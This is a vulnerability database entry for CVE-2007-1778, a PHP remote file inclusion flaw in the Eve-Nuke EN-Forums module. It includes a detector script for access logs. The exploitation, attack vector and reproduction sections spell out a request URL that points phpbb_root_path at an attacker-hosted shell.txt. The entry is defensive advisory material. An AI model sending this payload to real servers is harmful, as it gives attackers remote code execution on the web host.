CVE-2007-1778
Description
PHP remote file inclusion in Eve-Nuke 0.1 EN-Forums module allows arbitrary code execution via phpbb_root_path parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The vulnerability resides in `db/mysql.php` of the EN-Forums module for PHP-Nuke, version 0.1. The script calls `require($phpbb_root_path . 'includes/functions_nuke.'.$phpEx);` without sanitizing the `$phpbb_root_path` variable. An attacker can supply a URL via the `phpbb_root_path` parameter, leading to a remote file inclusion (RFI) flaw [1].
Exploitation
An attacker sends a crafted HTTP request to `modules/EN-Forums/db/mysql.php` with the `phpbb_root_path` parameter set to a URL hosting malicious PHP code. No authentication or prior access is required; only network connectivity to the target is needed. The exploit URL pattern is `http://target/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://attacker/shell.txt?` (the trailing `?` prevents appending local path components). The remote file is included and executed by the server [1].
Impact
Successful exploitation allows arbitrary PHP code execution with the privileges of the web server user. This can lead to full compromise of the web application, including data theft, defacement, or further attacks on the underlying system [1].
Mitigation
No official patch or fix has been released for this vulnerability. The EN-Forums module (Eve-Nuke 0.1) appears to be abandoned. Administrators should immediately remove or disable the module from their PHP-Nuke installation. As of the publication date, no workaround is available, and the issue is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:eve-nuke:eve-nuke_forum:0.1:*:*:*:*:*:*:*
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Unsanitized use of the `phpbb_root_path` parameter in a `require()` call allows remote file inclusion."
Attack vector
An attacker sends an HTTP GET request to `db/mysql.php` with the `phpbb_root_path` parameter set to a URL pointing to a remote shell (e.g., `http://www.site.com/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://attacker.com/shell.txt?`). The `require()` call then includes the attacker-controlled remote file, allowing arbitrary PHP code execution [1]. No authentication or special privileges are required.
Affected code
The vulnerable code is in `db/mysql.php` within the Eve-Nuke 0.1 (EN-Forums) module for PHP-Nuke. The file contains the statement `require($phpbb_root_path . 'includes/functions_nuke.'.$phpEx);` which directly uses the `$phpbb_root_path` variable without sanitization [1].
What the fix does
No patch is provided in the bundle. The advisory does not specify a fix. To remediate, the `$phpbb_root_path` parameter should be sanitized to only allow local, predefined paths, and remote file inclusion should be disabled by setting `allow_url_include` to Off in PHP configuration.
Preconditions
- config: The PHP setting `allow_url_include` must be enabled for remote file inclusion to succeed.
- network: The attacker must be able to reach the vulnerable `db/mysql.php` script over HTTP.
- auth: No authentication is required.
- input: The attacker supplies a URL via the `phpbb_root_path` GET parameter.
Reproduction
Visit `http://target.com/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://attacker.com/shell.txt?` where `shell.txt` contains PHP code. The trailing `?` prevents the appended string from interfering with the remote file [1].
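A log check for the request pattern described above, as an added example that is not part of the CVE record or the Eve-Nuke code. It assumes combined-format web server access logs; the function names and the sample entries are constructed for illustration, and only values passed in the GET query string are visible to it.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Client address and request target of a combined-format access log entry.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SCRIPT_SUFFIX = "/modules/en-forums/db/mysql.php"  # script named in the advisory
PARAM = "phpbb_root_path"                          # parameter named in the advisory
REMOTE_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)  # scheme://...

def classify(target):
    """Return 'remote-include', 'param-set' or None for one request target."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(SCRIPT_SUFFIX):
        return None
    verdict = None
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != PARAM:
            continue
        if REMOTE_RE.match(value):
            return "remote-include"
        verdict = "param-set"  # client-supplied include root: still worth review
    return verdict

def scan(lines):
    """Return (line_number, client, verdict) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = REQUEST_RE.match(line)
        verdict = classify(m.group("target")) if m else None
        if verdict:
            hits.append((number, m.group("client"), verdict))
    return hits

# Constructed sample entries (documentation addresses, example hostnames).
_TS = "[24/May/2026:10:00:00 +0000]"
_SCRIPT = "/modules/EN-Forums/db/mysql.php"
SAMPLE_LOG = [
    f'192.0.2.10 - - {_TS} "GET /modules.php?name=EN-Forums HTTP/1.1" 200 5120',
    f'203.0.113.5 - - {_TS} "GET {_SCRIPT}?{PARAM}=http://files.example.net/a.txt? HTTP/1.1" 200 312',
    f'203.0.113.5 - - {_TS} "GET {_SCRIPT}?{PARAM}=http%3A%2F%2Ffiles.example.net%2Fa.txt%3F HTTP/1.0" 200 312',
    f'192.0.2.44 - - {_TS} "GET {_SCRIPT}?{PARAM}=./ HTTP/1.1" 500 0',
    f'192.0.2.10 - - {_TS} "GET {_SCRIPT} HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A `remote-include` hit followed by a 200 response on a host where `allow_url_include` is enabled warrants treating the server as potentially compromised; `param-set` hits show that the script is reachable and being probed.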
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.